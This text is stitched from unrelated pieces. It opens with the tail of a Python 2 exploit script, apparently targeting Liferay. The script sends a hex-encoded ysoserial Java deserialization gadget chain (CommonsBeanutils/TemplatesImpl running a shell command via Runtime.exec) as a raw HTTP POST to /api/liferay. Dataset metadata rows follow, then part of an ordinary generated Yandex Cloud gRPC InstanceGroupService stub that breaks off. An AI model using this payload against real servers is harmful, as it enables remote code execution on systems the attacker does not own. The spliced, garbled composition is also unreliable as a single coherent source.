\x69\x6d\x61\x67\x65\x2e\x43\x6f\x6d\x70\x6f\x6e\x65\x6e\x74\x43\x6f\x6c\x6f\x72\x4d\x6f\x64\x65\x6c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x77\x0c\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x03\xe8\x75\x71\x00\x7e\x00\x19\x00\x00\x00\x03\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x08\x77\x0a\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x78\x73\x72\x00\x13\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x74\x61\x62\x6c\x65\x13\xbb\x0f\x25\x21\x4a\xe4\xb8\x03\x00\x02\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x08\x77\x08\x00\x00\x00\x0b\x00\x00\x00\x00\x78\x75\x71\x00\x7e\x00\x0b\x00\x00\x0a\xc7\xac\xed\x00\x05\x73\x72\x00\x17\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x50\x72\x69\x6f\x72\x69\x74\x79\x51\x75\x65\x75\x65\x94\xda\x30\xb4\xfb\x3f\x82\xb1\x03\x00\x02\x49\x00\x04\x73\x69\x7a\x65\x4c\x00\x0a\x63\x6f\x6d\x70\x61\x72\x61\x74\x6f\x72\x74\x00\x16\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x43\x6f\x6d\x70\x61\x72\x61\x74\x6f\x72\x3b\x78\x70\x00\x00\x00\x02\x73\x72\x00\x2b\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x62\x65\x61\x6e\x75\x74\x69\x6c\x73\x2e\x42\x65\x61\x6e\x43\x6f\x6d\x70\x61\x72\x61\x74\x6f\x72\xe3\xa1\x88\xea\x73\x22\xa4\x48\x02\x00\x02\x4c\x00\x0a\x63\x6f\x6d\x70\x61\x72\x61\x74\x6f\x72\x71\x00\x7e\x00\x01\x4c\x00\x08\x70\x72\x6f\x70\x65\x72\x74\x79\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x78\x70\x73\x72\x00\x3f\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x63\x6f\x6d\x70\x61\x72\x61\x74\x6f\x72\x73\x2e\x43\x6f\x6d\x70\x61\x72\x61\x62\x6c\x65\x43\x6f\x6d\x70\x61\x72\x61\x74\x6f\x72\xfb\xf4\x99\x25\xb8\x6e\xb1\x37\x02\x00\x00\x78\x70\x74\x00\x10\x6f\x75\x74\x70\x75\x74\x50\x72\x6f\x70\x65\x72\x74\x69\x65\x73\x77\x04\x00\x00\x00\x03\x73\x72\x00\x3a\x63\x6f\x6d\x2e\x73\x75\x6e\x2e\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x78\x61\x6c\x61\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x78\x73\x6c\x74\x63\x2e\x74\x72\x61\x78\x2e\x54\x65\x6d\x70\x6c\x61\x74\x65\x73\x49\x6d\x70\x6c\x09\x57\x4f\xc1\x6e\xac\xab\x33\x03\x00\x06\x49\x00\x0d\x5f\x69\x6e\x64\x65\x6e\x74\x4e\x75\x6d\x62\x65\x72\x49\x00\x0e\x5f\x74\x72\x61\x6e\x73\x6c\x65\x74\x49\x6e\x64\x65\x78\x5b\x00\x0a\x5f\x62\x79\x74\x65\x63\x6f\x64\x65\x73\x74\x00\x03\x5b\x5b\x42\x5b\x00\x06\x5f\x63\x6c\x61\x73\x73\x74\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x4c\x00\x05\x5f\x6e\x61\x6d\x65\x71\x00\x7e\x00\x04\x4c\x00\x11\x5f\x6f\x75\x74\x70\x75\x74\x50\x72\x6f\x70\x65\x72\x74\x69\x65\x73\x74\x00\x16\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x50\x72\x6f\x70\x65\x72\x74\x69\x65\x73\x3b\x78\x70\x00\x00\x00\x00\xff\xff\xff\xff\x75\x72\x00\x03\x5b\x5b\x42\x4b\xfd\x19\x15\x67\x67\xdb\x37\x02\x00\x00\x78\x70\x00\x00\x00\x02\x75\x72\x00\x02\x5b\x42\xac\xf3\x17\xf8\x06\x08\x54\xe0\x02\x00\x00\x78\x70\x00\x00\x06\x94\xca\xfe\xba\xbe\x00\x00\x00\x31\x00\x38\x07\x00\x36\x01\x00\x33\x79\x73\x6f\x73\x65\x72\x69\x61\x6c\x2f\x70\x61\x79\x6c\x6f\x61\x64\x73\x2f\x75\x74\x69\x6c\x2f\x47\x61\x64\x67\x65\x74\x73\x24\x53\x74\x75\x62\x54\x72\x61\x6e\x73\x6c\x65\x74\x50\x61\x79\x6c\x6f\x61\x64\x07\x00\x04\x01\x00\x40\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x61\x6c\x61\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x78\x73\x6c\x74\x63\x2f\x72\x75\x6e\x74\x69\x6d\x65\x2f\x41\x62\x73\x74\x72\x61\x63\x74\x54\x72\x61\x6e\x73\x6c\x65\x74\x07\x00\x06\x01\x00\x14\x6a\x61\x76\x61\x2f\x69\x6f\x2f\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x62\x6c\x65\x01\x00\x10\x73\x65\x72\x69\x61\x6c\x56\x65\x72\x73\x69\x6f\x6e\x55\x49\x44\x01\x00\x01\x4a\x01\x00\x0d\x43\x6f\x6e\x73\x74\x61\x6e\x74\x56\x61\x6c\x75\x65\x05\xad\x20\x93\xf3\x91\xdd\xef\x3e\x01\x00\x06\x3c\x69\x6e\x69\x74\x3e\x01\x00\x03\x28\x29\x56\x01\x00\x04\x43\x6f\x64\x65\x0a\x00\x03\x00\x10\x0c\x00\x0c\x00\x0d\x01\x00\x0f\x4c\x69\x6e\x65\x4e\x75\x6d\x62\x65\x72\x54\x61\x62\x6c\x65\x01\x00\x12\x4c\x6f\x63\x61\x6c\x56\x61\x72\x69\x61\x62\x6c\x65\x54\x61\x62\x6c\x65\x01\x00\x04\x74\x68\x69\x73\x01\x00\x35\x4c\x79\x73\x6f\x73\x65\x72\x69\x61\x6c\x2f\x70\x61\x79\x6c\x6f\x61\x64\x73\x2f\x75\x74\x69\x6c\x2f\x47\x61\x64\x67\x65\x74\x73\x24\x53\x74\x75\x62\x54\x72\x61\x6e\x73\x6c\x65\x74\x50\x61\x79\x6c\x6f\x61\x64\x3b\x01\x00\x09\x74\x72\x61\x6e\x73\x66\x6f\x72\x6d\x01\x00\x72\x28\x4c\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x61\x6c\x61\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x78\x73\x6c\x74\x63\x2f\x44\x4f\x4d\x3b\x5b\x4c\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x73\x65\x72\x69\x61\x6c\x69\x7a\x65\x72\x2f\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x29\x56\x01\x00\x0a\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x73\x07\x00\x19\x01\x00\x39\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x61\x6c\x61\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x78\x73\x6c\x74\x63\x2f\x54\x72\x61\x6e\x73\x6c\x65\x74\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x01\x00\x08\x64\x6f\x63\x75\x6d\x65\x6e\x74\x01\x00\x2d\x4c\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x61\x6c\x61\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x78\x73\x6c\x74\x63\x2f\x44\x4f\x4d\x3b\x01\x00\x08\x68\x61\x6e\x64\x6c\x65\x72\x73\x01\x00\x42\x5b\x4c\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x73\x65\x72\x69\x61\x6c\x69\x7a\x65\x72\x2f\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x01\x00\xa6\x28\x4c\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x61\x6c\x61\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x78\x73\x6c\x74\x63\x2f\x44\x4f\x4d\x3b\x4c\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x64\x74\x6d\x2f\x44\x54\x4d\x41\x78\x69\x73\x49\x74\x65\x72\x61\x74\x6f\x72\x3b\x4c\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x73\x65\x72\x69\x61\x6c\x69\x7a\x65\x72\x2f\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x29\x56\x01\x00\x08\x69\x74\x65\x72\x61\x74\x6f\x72\x01\x00\x35\x4c\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x64\x74\x6d\x2f\x44\x54\x4d\x41\x78\x69\x73\x49\x74\x65\x72\x61\x74\x6f\x72\x3b\x01\x00\x07\x68\x61\x6e\x64\x6c\x65\x72\x01\x00\x41\x4c\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x73\x65\x72\x69\x61\x6c\x69\x7a\x65\x72\x2f\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x01\x00\x0a\x53\x6f\x75\x72\x63\x65\x46\x69\x6c\x65\x01\x00\x0c\x47\x61\x64\x67\x65\x74\x73\x2e\x6a\x61\x76\x61\x01\x00\x0c\x49\x6e\x6e\x65\x72\x43\x6c\x61\x73\x73\x65\x73\x07\x00\x27\x01\x00\x1f\x79\x73\x6f\x73\x65\x72\x69\x61\x6c\x2f\x70\x61\x79\x6c\x6f\x61\x64\x73\x2f\x75\x74\x69\x6c\x2f\x47\x61\x64\x67\x65\x74\x73\x01\x00\x13\x53\x74\x75\x62\x54\x72\x61\x6e\x73\x6c\x65\x74\x50\x61\x79\x6c\x6f\x61\x64\x01\x00\x08\x3c\x63\x6c\x69\x6e\x69\x74\x3e\x01\x00\x11\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x52\x75\x6e\x74\x69\x6d\x65\x07\x00\x2a\x01\x00\x0a\x67\x65\x74\x52\x75\x6e\x74\x69\x6d\x65\x01\x00\x15\x28\x29\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x52\x75\x6e\x74\x69\x6d\x65\x3b\x0c\x00\x2c\x00\x2d\x0a\x00\x2b\x00\x2e\x01\x00\x17\x74\x6f\x75\x63\x68\x20\x2f\x74\x6d\x70\x2f\x69\x6d\x61\x67\x65\x5f\x62\x79\x70\x61\x73\x73\x08\x00\x30\x01\x00\x04\x65\x78\x65\x63\x01\x00\x27\x28\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x29\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x50\x72\x6f\x63\x65\x73\x73\x3b\x0c\x00\x32\x00\x33\x0a\x00\x2b\x00\x34\x01\x00\x1e\x79\x73\x6f\x73\x65\x72\x69\x61\x6c\x2f\x50\x77\x6e\x65\x72\x31\x31\x35\x37\x37\x36\x36\x32\x30\x33\x30\x39\x33\x38\x32\x01\x00\x20\x4c\x79\x73\x6f\x73\x65\x72\x69\x61\x6c\x2f\x50\x77\x6e\x65\x72\x31\x31\x35\x37\x37\x36\x36\x32\x30\x33\x30\x39\x33\x38\x32\x3b\x00\x21\x00\x01\x00\x03\x00\x01\x00\x05\x00\x01\x00\x1a\x00\x07\x00\x08\x00\x01\x00\x09\x00\x00\x00\x02\x00\x0a\x00\x04\x00\x01\x00\x0c\x00\x0d\x00\x01\x00\x0e\x00\x00\x00\x2f\x00\x01\x00\x01\x00\x00\x00\x05\x2a\xb7\x00\x0f\xb1\x00\x00\x00\x02\x00\x11\x00\x00\x00\x06\x00\x01\x00\x00\x00\x2e\x00\x12\x00\x00\x00\x0c\x00\x01\x00\x00\x00\x05\x00\x13\x00\x37\x00\x00\x00\x01\x00\x15\x00\x16\x00\x02\x00\x17\x00\x00\x00\x04\x00\x01\x00\x18\x00\x0e\x00\x00\x00\x3f\x00\x00\x00\x03\x00\x00\x00\x01\xb1\x00\x00\x00\x02\x00\x11\x00\x00\x00\x06\x00\x01\x00\x00\x00\x33\x00\x12\x00\x00\x00\x20\x00\x03\x00\x00\x00\x01\x00\x13\x00\x37\x00\x00\x00\x00\x00\x01\x00\x1a\x00\x1b\x00\x01\x00\x00\x00\x01\x00\x1c\x00\x1d\x00\x02\x00\x01\x00\x15\x00\x1e\x00\x02\x00\x17\x00\x00\x00\x04\x00\x01\x00\x18\x00\x0e\x00\x00\x00\x49\x00\x00\x00\x04\x00\x00\x00\x01\xb1\x00\x00\x00\x02\x00\x11\x00\x00\x00\x06\x00\x01\x00\x00\x00\x37\x00\x12\x00\x00\x00\x2a\x00\x04\x00\x00\x00\x01\x00\x13\x00\x37\x00\x00\x00\x00\x00\x01\x00\x1a\x00\x1b\x00\x01\x00\x00\x00\x01\x00\x1f\x00\x20\x00\x02\x00\x00\x00\x01\x00\x21\x00\x22\x00\x03\x00\x08\x00\x29\x00\x0d\x00\x01\x00\x0e\x00\x00\x00\x1b\x00\x03\x00\x02\x00\x00\x00\x0f\xa7\x00\x03\x01\x4c\xb8\x00\x2f\x12\x31\xb6\x00\x35\x57\xb1\x00\x00\x00\x00\x00\x02\x00\x23\x00\x00\x00\x02\x00\x24\x00\x25\x00\x00\x00\x0a\x00\x01\x00\x01\x00\x26\x00\x28\x00\x09\x75\x71\x00\x7e\x00\x10\x00\x00\x01\xd4\xca\xfe\xba\xbe\x00\x00\x00\x31\x00\x1b\x07\x00\x02\x01\x00\x23\x79\x73\x6f\x73\x65\x72\x69\x61\x6c\x2f\x70\x61\x79\x6c\x6f\x61\x64\x73\x2f\x75\x74\x69\x6c\x2f\x47\x61\x64\x67\x65\x74\x73\x24\x46\x6f\x6f\x07\x00\x04\x01\x00\x10\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x07\x00\x06\x01\x00\x14\x6a\x61\x76\x61\x2f\x69\x6f\x2f\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x62\x6c\x65\x01\x00\x10\x73\x65\x72\x69\x61\x6c\x56\x65\x72\x73\x69\x6f\x6e\x55\x49\x44\x01\x00\x01\x4a\x01\x00\x0d\x43\x6f\x6e\x73\x74\x61\x6e\x74\x56\x61\x6c\x75\x65\x05\x71\xe6\x69\xee\x3c\x6d\x47\x18\x01\x00\x06\x3c\x69\x6e\x69\x74\x3e\x01\x00\x03\x28\x29\x56\x01\x00\x04\x43\x6f\x64\x65\x0a\x00\x03\x00\x10\x0c\x00\x0c\x00\x0d\x01\x00\x0f\x4c\x69\x6e\x65\x4e\x75\x6d\x62\x65\x72\x54\x61\x62\x6c\x65\x01\x00\x12\x4c\x6f\x63\x61\x6c\x56\x61\x72\x69\x61\x62\x6c\x65\x54\x61\x62\x6c\x65\x01\x00\x04\x74\x68\x69\x73\x01\x00\x25\x4c\x79\x73\x6f\x73\x65\x72\x69\x61\x6c\x2f\x70\x61\x79\x6c\x6f\x61\x64\x73\x2f\x75\x74\x69\x6c\x2f\x47\x61\x64\x67\x65\x74\x73\x24\x46\x6f\x6f\x3b\x01\x00\x0a\x53\x6f\x75\x72\x63\x65\x46\x69\x6c\x65\x01\x00\x0c\x47\x61\x64\x67\x65\x74\x73\x2e\x6a\x61\x76\x61\x01\x00\x0c\x49\x6e\x6e\x65\x72\x43\x6c\x61\x73\x73\x65\x73\x07\x00\x19\x01\x00\x1f\x79\x73\x6f\x73\x65\x72\x69\x61\x6c\x2f\x70\x61\x79\x6c\x6f\x61\x64\x73\x2f\x75\x74\x69\x6c\x2f\x47\x61\x64\x67\x65\x74\x73\x01\x00\x03\x46\x6f\x6f\x00\x21\x00\x01\x00\x03\x00\x01\x00\x05\x00\x01\x00\x1a\x00\x07\x00\x08\x00\x01\x00\x09\x00\x00\x00\x02\x00\x0a\x00\x01\x00\x01\x00\x0c\x00\x0d\x00\x01\x00\x0e\x00\x00\x00\x2f\x00\x01\x00\x01\x00\x00\x00\x05\x2a\xb7\x00\x0f\xb1\x00\x00\x00\x02\x00\x11\x00\x00\x00\x06\x00\x01\x00\x00\x00\x3b\x00\x12\x00\x00\x00\x0c\x00\x01\x00\x00\x00\x05\x00\x13\x00\x14\x00\x00\x00\x02\x00\x15\x00\x00\x00\x02\x00\x16\x00\x17\x00\x00\x00\x0a\x00\x01\x00\x01\x00\x18\x00\x1a\x00\x09\x70\x74\x00\x04\x50\x77\x6e\x72\x70\x77\x01\x00\x78\x71\x00\x7e\x00\x0d\x78'
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = (sys.argv[1], int(sys.argv[2]))
print '[+] connecting to %s port %s' % server_address
sock.connect(server_address)
print '[+] Sending payload...'
pwned = ('POST /api/liferay HTTP/1.1\r\n' +
'Content-Type: application/octet-stream\r\n' +
'User-Agent: Robots are my next of kin\r\n' +
'Host: ' + sys.argv[1] + ':' + sys.argv[2] +' \r\n' +
'Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2\r\n' +
'Connection: keep-alive\r\n' +
'Content-Length: ' + str(len(payload)) + '\r\n\r\n')
pwned += payload
sock.sendall(pwned)
sock.close()
print '[+] Done!'
| 482.945946 | 16,856 | 0.743019 | 4,372 | 17,869 | 3.035224 | 0.064044 | 0.118915 | 0.109194 | 0.065109 | 0.729314 | 0.672796 | 0.641824 | 0.613112 | 0.591183 | 0.555237 | 0 | 0.409708 | 0.010801 | 17,869 | 36 | 16,857 | 496.361111 | 0.341027 | 0.010857 | 0 | 0 | 0 | 0.090909 | 0.97249 | 0.955055 | 0 | 1 | 0 | 0 | 0 | 0 | null | null | 0.045455 | 0.090909 | null | null | 0.181818 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
bf1523c533ad1e4d28eda2be9ff6ba103a6fb25f | 39,680 | py | Python | yandex/cloud/compute/v1/instancegroup/instance_group_service_pb2_grpc.py | korsar182/python-sdk | 873bf2a9b136a8f2faae72e86fae1f5b5c3d896a | [
"MIT"
] | 36 | 2018-12-23T13:51:50.000Z | 2022-03-25T07:48:24.000Z | yandex/cloud/compute/v1/instancegroup/instance_group_service_pb2_grpc.py | korsar182/python-sdk | 873bf2a9b136a8f2faae72e86fae1f5b5c3d896a | [
"MIT"
] | 15 | 2019-02-28T04:55:09.000Z | 2022-03-06T23:17:24.000Z | yandex/cloud/compute/v1/instancegroup/instance_group_service_pb2_grpc.py | korsar182/python-sdk | 873bf2a9b136a8f2faae72e86fae1f5b5c3d896a | [
"MIT"
] | 18 | 2019-02-23T07:10:57.000Z | 2022-03-28T14:41:08.000Z | # Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
from yandex.cloud.access import access_pb2 as yandex_dot_cloud_dot_access_dot_access__pb2
from yandex.cloud.compute.v1.instancegroup import instance_group_pb2 as yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__pb2
from yandex.cloud.compute.v1.instancegroup import instance_group_service_pb2 as yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2
from yandex.cloud.operation import operation_pb2 as yandex_dot_cloud_dot_operation_dot_operation__pb2
class InstanceGroupServiceStub(object):
"""A set of methods for managing InstanceGroup resources.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.Get = channel.unary_unary(
'/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/Get',
request_serializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.GetInstanceGroupRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__pb2.InstanceGroup.FromString,
)
self.List = channel.unary_unary(
'/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/List',
request_serializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.ListInstanceGroupsRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.ListInstanceGroupsResponse.FromString,
)
self.Create = channel.unary_unary(
'/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/Create',
request_serializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.CreateInstanceGroupRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.CreateFromYaml = channel.unary_unary(
'/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/CreateFromYaml',
request_serializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.CreateInstanceGroupFromYamlRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.Update = channel.unary_unary(
'/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/Update',
request_serializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.UpdateInstanceGroupRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.UpdateFromYaml = channel.unary_unary(
'/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/UpdateFromYaml',
request_serializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.UpdateInstanceGroupFromYamlRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.Stop = channel.unary_unary(
'/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/Stop',
request_serializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.StopInstanceGroupRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.Start = channel.unary_unary(
'/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/Start',
request_serializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.StartInstanceGroupRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.Delete = channel.unary_unary(
'/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/Delete',
request_serializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.DeleteInstanceGroupRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.ListInstances = channel.unary_unary(
'/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/ListInstances',
request_serializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.ListInstanceGroupInstancesRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.ListInstanceGroupInstancesResponse.FromString,
)
self.DeleteInstances = channel.unary_unary(
'/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/DeleteInstances',
request_serializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.DeleteInstancesRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.StopInstances = channel.unary_unary(
'/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/StopInstances',
request_serializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.StopInstancesRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.ListOperations = channel.unary_unary(
'/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/ListOperations',
request_serializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.ListInstanceGroupOperationsRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.ListInstanceGroupOperationsResponse.FromString,
)
self.ListLogRecords = channel.unary_unary(
'/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/ListLogRecords',
request_serializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.ListInstanceGroupLogRecordsRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.ListInstanceGroupLogRecordsResponse.FromString,
)
self.ListAccessBindings = channel.unary_unary(
'/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/ListAccessBindings',
request_serializer=yandex_dot_cloud_dot_access_dot_access__pb2.ListAccessBindingsRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_access_dot_access__pb2.ListAccessBindingsResponse.FromString,
)
self.SetAccessBindings = channel.unary_unary(
'/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/SetAccessBindings',
request_serializer=yandex_dot_cloud_dot_access_dot_access__pb2.SetAccessBindingsRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.UpdateAccessBindings = channel.unary_unary(
'/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/UpdateAccessBindings',
request_serializer=yandex_dot_cloud_dot_access_dot_access__pb2.UpdateAccessBindingsRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.ResumeProcesses = channel.unary_unary(
'/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/ResumeProcesses',
request_serializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.ResumeInstanceGroupProcessesRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.PauseProcesses = channel.unary_unary(
'/yandex.cloud.compute.v1.instancegroup.InstanceGroupService/PauseProcesses',
request_serializer=yandex_dot_cloud_dot_compute_dot_v1_dot_instancegroup_dot_instance__group__service__pb2.PauseInstanceGroupProcessesRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
class InstanceGroupServiceServicer(object):
"""A set of methods for managing InstanceGroup resources.
"""
def Get(self, request, context):
"""Returns the specified InstanceGroup resource.
To get the list of available InstanceGroup resources, make a [List] request.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def List(self, request, context):
"""Retrieves the list of InstanceGroup resources in the specified folder.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Create(self, request, context):
"""Creates an instance group in the specified folder.
This method starts an operation that can be cancelled by another operation.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
